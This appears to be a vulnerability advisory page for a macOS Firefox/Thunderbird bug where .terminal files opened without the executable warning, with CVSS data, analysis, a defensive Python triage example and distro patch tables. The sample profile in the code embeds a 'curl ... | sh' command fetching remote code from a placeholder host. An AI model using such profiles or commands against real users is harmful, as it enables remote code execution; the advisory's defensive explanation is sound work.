CVE-2025-6426

EUVD-2025-19102 | HIGH
Published: 2025-06-24
CVSS 3.1 base score: 8.8

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline (4 events)

- Patch Released: Mar 31, 2026 - 21:13 (nvd), patch available
- Analysis Generated: Mar 15, 2026 - 22:36 (vuln.today)
- EUVD ID Assigned: Mar 15, 2026 - 22:36 (euvd), EUVD-2025-19102
- CVE Published: Jun 24, 2025 - 13:15 (nvd)

Description

The executable file warning did not warn users before opening files with the `terminal` extension. *This bug only affects Firefox for macOS. Other versions of Firefox are unaffected.* This vulnerability affects Firefox < 140, Firefox ESR < 128.12, Thunderbird < 140, and Thunderbird < 128.12.

Analysis

CVE-2025-6426 is a missing executable file warning in Firefox and Thunderbird on macOS: the dialog normally shown before a downloaded executable is handed to the operating system was not shown for files with the `terminal` extension. A `.terminal` file is a Terminal.app profile that can carry a command for Terminal to run when the profile is opened, so opening such a download without the prompt can run attacker-chosen commands under the user's account. The affected versions are Firefox < 140, Firefox ESR < 128.12, Thunderbird < 140 and Thunderbird < 128.12, on macOS only. Exploitation needs user interaction (CVSS UI:R): the victim must download the file and then open it, typically from the downloads panel, at which point the missing warning removes the one browser-side check that would otherwise make the user stop and think before the file reaches Terminal.app.

Technical Context

The weakness is classified as CWE-345 (Insufficient Verification of Data Authenticity); in practice the defect is an incomplete list of dangerous file types. Firefox and Thunderbird keep a list of file extensions that they treat as executable; when a downloaded file's extension is on that list, the download manager shows the executable file warning before launching it. The `terminal` extension was missing from that list, so `.terminal` files were passed straight to the OS default handler, Terminal.app, with no prompt. A `.terminal` file is not a shell script: it is a property list (XML plist) holding a Terminal "Window Settings" profile, and a profile may include a CommandString key whose value Terminal executes when the profile is opened, which is what makes the type as dangerous as a script. The bug is macOS-specific because Terminal.app, and therefore the `.terminal` type, exist only there. The affected CPE ranges are: mozilla:firefox < 140.0, mozilla:firefox_esr < 128.12, mozilla:thunderbird < 140.0, and mozilla:thunderbird < 128.12. The root cause is incomplete enumeration of dangerous file types in the extension check; fixed builds warn before opening these files.
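As an added illustration (not Mozilla's code and not from this page), the Python below models the two halves of the issue described in the Analysis and Technical Context above: a download-handler check that gates the warning on an extension list, run once with a hypothetical pre-fix list that lacks `terminal` and once with the same list plus `terminal`, and a parser that inspects a constructed `.terminal` plist for the CommandString that makes the type dangerous. The pre-fix extension set, the function names and the sample profile are assumptions for illustration; only the CommandString / RunCommandAsShell keys and the "Window Settings" profile type are Terminal.app's own.

```python
import plistlib
from xml.parsers.expat import ExpatError

# Simplified model of a browser download-handler check (NOT Mozilla's code).
# A file is treated as "executable" if its extension is on the list, and the
# executable file warning is shown before the file is handed to the OS.
# The pre-fix set is a hypothetical stand-in; the only point it makes is that
# "terminal" was absent, which is what the advisory describes.
EXECUTABLE_EXTS_PRE_FIX = frozenset({"app", "command", "sh", "pkg", "dmg"})  # hypothetical
EXECUTABLE_EXTS_FIXED = EXECUTABLE_EXTS_PRE_FIX | {"terminal"}


def needs_executable_warning(filename: str, exts=EXECUTABLE_EXTS_FIXED) -> bool:
    """True if the file's extension is one the warning dialog gates on."""
    _, dot, ext = filename.rpartition(".")
    return bool(dot) and ext.lower() in exts


# Constructed sample of a .terminal file: a Terminal.app "Window Settings"
# profile (XML plist) carrying a CommandString that Terminal runs on open.
SAMPLE_TERMINAL = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>name</key><string>Invoice</string>
    <key>type</key><string>Window Settings</string>
    <key>CommandString</key><string>curl -s http://example.invalid/x | sh</string>
    <key>RunCommandAsShell</key><true/>
</dict>
</plist>
"""


def inspect_terminal_profile(data: bytes) -> dict:
    """Parse a .terminal plist and report whether it embeds a command to run.

    Useful for triage of a downloaded .terminal file: a profile with no
    CommandString only changes colours and fonts, one with it runs code.
    """
    try:
        plist = plistlib.loads(data)
    except (plistlib.InvalidFileException, ExpatError) as exc:
        return {"parsed": False, "error": str(exc)}
    if not isinstance(plist, dict):
        return {"parsed": False, "error": "top-level object is not a dict"}
    cmd = plist.get("CommandString")
    return {
        "parsed": True,
        "profile_name": plist.get("name"),
        "profile_type": plist.get("type"),
        "runs_command": bool(cmd),
        "command": cmd,
        "as_shell": bool(plist.get("RunCommandAsShell", False)),
    }


if __name__ == "__main__":
    for name in ("invoice.terminal", "invoice.TERMINAL", "notes.txt"):
        print(f"{name}: pre-fix warn={needs_executable_warning(name, EXECUTABLE_EXTS_PRE_FIX)}"
              f" fixed warn={needs_executable_warning(name)}")
    print(inspect_terminal_profile(SAMPLE_TERMINAL))
```

The extension check is deliberately case-insensitive; a gate that compared `ext` verbatim would miss `invoice.TERMINAL` even after the fix. For triage of a real download, run `inspect_terminal_profile` over the file's bytes and treat `runs_command` as the signal.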

Affected Products

- Mozilla Firefox (< 140.0)
- Mozilla Firefox ESR (< 128.12)
- Mozilla Thunderbird (< 140.0)
- Mozilla Thunderbird (< 128.12, ESR track)

Priority Score

44
Components: KEV 0, EPSS +0.0, CVSS +44, POC 0

Vendor Status

Ubuntu

Priority: Medium
firefox
Release Status Version
jammy not-affected code not present
noble not-affected code not present
oracular not-affected code not present
plucky not-affected code not present
upstream not-affected debian: MacOS-specific
questing not-affected code not present
thunderbird
Release Status Version
noble not-affected code not present
oracular not-affected code not present
plucky not-affected code not present
jammy released 1:128.12.0+build1-0ubuntu0.22.04.1
upstream released 128.12
questing not-affected code not present
mozjs38
Release Status Version
bionic needs-triage -
jammy DNE -
noble DNE -
oracular DNE -
plucky DNE -
upstream needs-triage -
questing DNE -
mozjs52
Release Status Version
bionic ignored -
focal ignored -
jammy DNE -
noble DNE -
oracular DNE -
plucky DNE -
upstream needs-triage -
questing DNE -
mozjs68
Release Status Version
focal ignored -
jammy DNE -
noble DNE -
oracular DNE -
plucky DNE -
upstream needs-triage -
questing DNE -
mozjs78
Release Status Version
jammy ignored -
noble DNE -
oracular DNE -
plucky DNE -
upstream needs-triage -
questing DNE -
mozjs91
Release Status Version
jammy ignored -
noble DNE -
oracular DNE -
plucky DNE -
upstream needs-triage -
questing DNE -
mozjs102
Release Status Version
jammy ignored -
noble ignored -
oracular DNE -
plucky DNE -
upstream needs-triage -
questing DNE -
mozjs115
Release Status Version
jammy DNE -
noble ignored -
oracular ignored -
plucky ignored -
upstream needs-triage -
questing DNE -

Debian

firefox
Release Status Fixed Version Urgency
sid fixed 148.0.2-1 -
(unstable) not-affected - -
firefox-esr
Release Status Fixed Version Urgency
bullseye fixed 115.14.0esr-1~deb11u1 -
bullseye (security) fixed 140.8.0esr-1~deb11u1 -
bookworm fixed 128.14.0esr-1~deb12u1 -
bookworm (security) fixed 140.8.0esr-1~deb12u1 -
trixie (security), trixie fixed 140.8.0esr-1~deb13u1 -
forky, sid fixed 140.8.0esr-1 -
(unstable) not-affected - -
thunderbird
Release Status Fixed Version Urgency
bullseye fixed 1:115.12.0-1~deb11u1 -
bullseye (security) fixed 1:140.8.0esr-1~deb11u1 -
bookworm fixed 1:140.6.0esr-1~deb12u1 -
bookworm (security) fixed 1:140.8.0esr-1~deb12u1 -
trixie (security), trixie fixed 1:140.8.0esr-1~deb13u1 -
forky, sid fixed 1:140.8.0esr-1 -
(unstable) not-affected - -


CVE-2025-6426 vulnerability details – vuln.today
